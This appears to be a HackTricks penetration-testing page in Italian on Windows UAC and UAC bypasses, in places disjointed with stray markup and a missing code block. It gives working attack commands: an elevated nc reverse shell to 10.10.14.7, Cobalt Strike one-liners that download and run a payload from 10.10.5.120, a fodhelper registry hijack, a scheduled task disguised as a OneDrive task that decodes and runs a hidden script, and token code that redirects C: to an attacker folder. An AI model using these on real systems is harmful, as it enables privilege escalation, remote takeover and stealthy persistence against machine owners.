UAC - User Account Control

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

UAC

User Account Control (UAC) è una funzionalità che abilita un prompt di consenso per attività elevate. Le applicazioni hanno diversi livelli di integrity, e un programma con un livello elevato può eseguire operazioni che potrebbero compromettere il sistema. Quando UAC è abilitato, le applicazioni e i task sono sempre eseguiti nel contesto di sicurezza di un account non-amministratore a meno che un amministratore non autorizzi esplicitamente queste applicazioni/task ad avere accesso di livello amministratore per l’esecuzione. È una funzionalità di convenienza che protegge gli amministratori da modifiche involontarie ma non è considerata un confine di sicurezza.

Per maggiori informazioni sui livelli di integrity:

Integrity Levels

Quando UAC è attivo, a un utente amministratore vengono forniti 2 token: uno standard, per eseguire azioni ordinarie a livello normale, e uno con i privilegi di amministratore.

Questa pagina descrive in dettaglio il funzionamento di UAC e include il processo di logon, l’esperienza utente e l’architettura di UAC. Gli amministratori possono utilizzare security policies per configurare come UAC opera specificamente per la loro organizzazione a livello locale (usando secpol.msc), oppure configurarle e distribuirle tramite Group Policy Objects (GPO) in un ambiente di dominio Active Directory. Le varie impostazioni sono trattate in dettaglio here. Ci sono 10 impostazioni di Group Policy che possono essere impostate per UAC. La tabella seguente fornisce ulteriori dettagli:

Policies for installing software on Windows

Le local security policies (“secpol.msc” sulla maggior parte dei sistemi) sono configurate di default per impedire agli utenti non amministratori di eseguire installazioni software. Questo significa che anche se un utente non amministratore può scaricare l’installer del tuo software, non sarà in grado di eseguirlo senza un account amministratore.

Registry Keys to Force UAC to Ask for Elevation

Come utente standard senza diritti amministrativi, puoi assicurarti che l’account “standard” venga richiesto di inserire le credenziali da UAC quando tenta di eseguire determinate azioni. Questa azione richiederebbe la modifica di determinate registry keys, per le quali occorrono permessi amministrativi, a meno che non esista un UAC bypass, o l’attaccante sia già loggato come admin.

Anche se l’utente è nel gruppo Administrators, queste modifiche costringono l’utente a reinserire le credenziali del proprio account per eseguire azioni amministrative.

L’unico svantaggio è che questo approccio richiede UAC disabilitato per funzionare, cosa improbabile in ambienti di produzione.

Le chiavi del registro e le voci che devi cambiare sono le seguenti (con i loro valori predefiniti tra parentesi):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Questo può anche essere fatto manualmente tramite lo strumento Local Security Policy. Una volta cambiato, le operazioni amministrative richiedono all’utente di reinserire le proprie credenziali.

Note

User Account Control non è un confine di sicurezza. Pertanto, gli utenti standard non possono evadere dai loro account e ottenere i diritti di amministratore senza un local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

Privilegi UAC

• Internet Explorer Protected Mode utilizza controlli di integrità per impedire ai processi con livello di integrità elevato (come i browser web) di accedere a dati con livello di integrità basso (come la cartella dei file temporanei di Internet). Questo viene fatto eseguendo il browser con un token a bassa integrità. Quando il browser tenta di accedere a dati memorizzati nella zona a bassa integrità, il sistema operativo verifica il livello di integrità del processo e consente l’accesso di conseguenza. Questa funzionalità aiuta a prevenire che attacchi di remote code execution ottengano accesso a dati sensibili sul sistema.
• Quando un utente effettua il logon su Windows, il sistema crea un token di accesso che contiene un elenco dei privilegi dell’utente. I privilegi sono definiti come la combinazione dei diritti e delle capacità di un utente. Il token contiene anche un elenco delle credenziali dell’utente, ovvero le credenziali utilizzate per autenticare l’utente al computer e alle risorse sulla rete.

Autoadminlogon

Per configurare Windows in modo che effettui automaticamente il logon di un utente specifico all’avvio, impostare la chiave di registro AutoAdminLogon. Questo è utile per ambienti kiosk o per scopi di testing. Utilizzalo solo su sistemi sicuri, poiché espone la password nel registro.

Imposta le seguenti chiavi usando l’Editor del Registro o reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Per ripristinare il comportamento di logon normale, impostare AutoAdminLogon a 0.

UAC bypass

Tip

Nota che se hai accesso grafico alla vittima, UAC bypass è semplice poiché puoi semplicemente cliccare su “Yes” quando appare il prompt UAC

Il bypass di UAC è necessario nella seguente situazione: UAC è attivato, il tuo processo è in esecuzione in un contesto di integrità media, e il tuo utente appartiene al gruppo Administrators.

È importante menzionare che è molto più difficile bypassare l’UAC se è impostato al livello di sicurezza più alto (Always) rispetto a qualsiasi altro livello (Default).

UAC disabilitato

Se UAC è già disabilitato (ConsentPromptBehaviorAdmin è 0) puoi eseguire una reverse shell con privilegi admin (livello di integrità alto) usando qualcosa come:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Molto elementare UAC “bypass” (accesso completo al file system)

Se hai una shell con un utente che appartiene al gruppo Administrators puoi montare la condivisione C$ tramite SMB (file system) localmente come un nuovo disco e avrai accesso a tutto il file system (anche alla cartella home di Administrator).

Warning

Sembra che questo trucco non funzioni più

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass con cobalt strike

Le tecniche di Cobalt Strike funzioneranno solo se UAC non è impostato al suo livello di sicurezza massimo.

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire e Metasploit hanno anche diversi moduli per il bypass della UAC.

KRBUACBypass

Documentazione e tool in https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME che è una compilation di diversi exploit di bypass UAC. Nota che sarà necessario compile UACME using visual studio or msbuild. La compilazione creerà diversi eseguibili (come Source\Akagi\outout\x64\Debug\Akagi.exe) , dovrai sapere quale ti serve.
Devi fare attenzione perché alcuni bypass mostreranno dei prompt di altri programmi che avviseranno l’utente che qualcosa sta succedendo.

UACME indica la versione build da cui ogni tecnica ha iniziato a funzionare. Puoi cercare una tecnica che interessi le tue versioni:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Inoltre, usando this ottieni la release di Windows 1607 dalle versioni di build.

UAC Bypass – fodhelper.exe (Registry hijack)

Il trusted binary fodhelper.exe viene auto-elevato nelle versioni moderne di Windows. Quando viene avviato, interroga il seguente percorso del registro per utente senza validare il verbo DelegateExecute. Inserire un comando lì permette a un processo Medium Integrity (l’utente è in Administrators) di avviare un processo High Integrity senza un prompt UAC.

Percorso del registro interrogato da fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Note:
- Funziona quando l'utente corrente è membro del gruppo Administrators e il livello UAC è default/lenient (non Always Notify con restrizioni extra).
- Usare il percorso `sysnative` per avviare un 64-bit PowerShell da un processo a 32-bit su 64-bit Windows.
- Il payload può essere qualsiasi comando (PowerShell, cmd o un percorso EXE). Evitare UI di prompt per stealth.

#### CurVer/extension hijack variant (HKCU only)

Esempi recenti che abusano di `fodhelper.exe` evitano `DelegateExecute` e invece **reindirizzano il ProgID `ms-settings`** tramite il valore per-utente `CurVer`. Il binario auto-elevato risolve comunque l'handler sotto `HKCU`, quindi non è necessario un token admin per impostare le chiavi:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"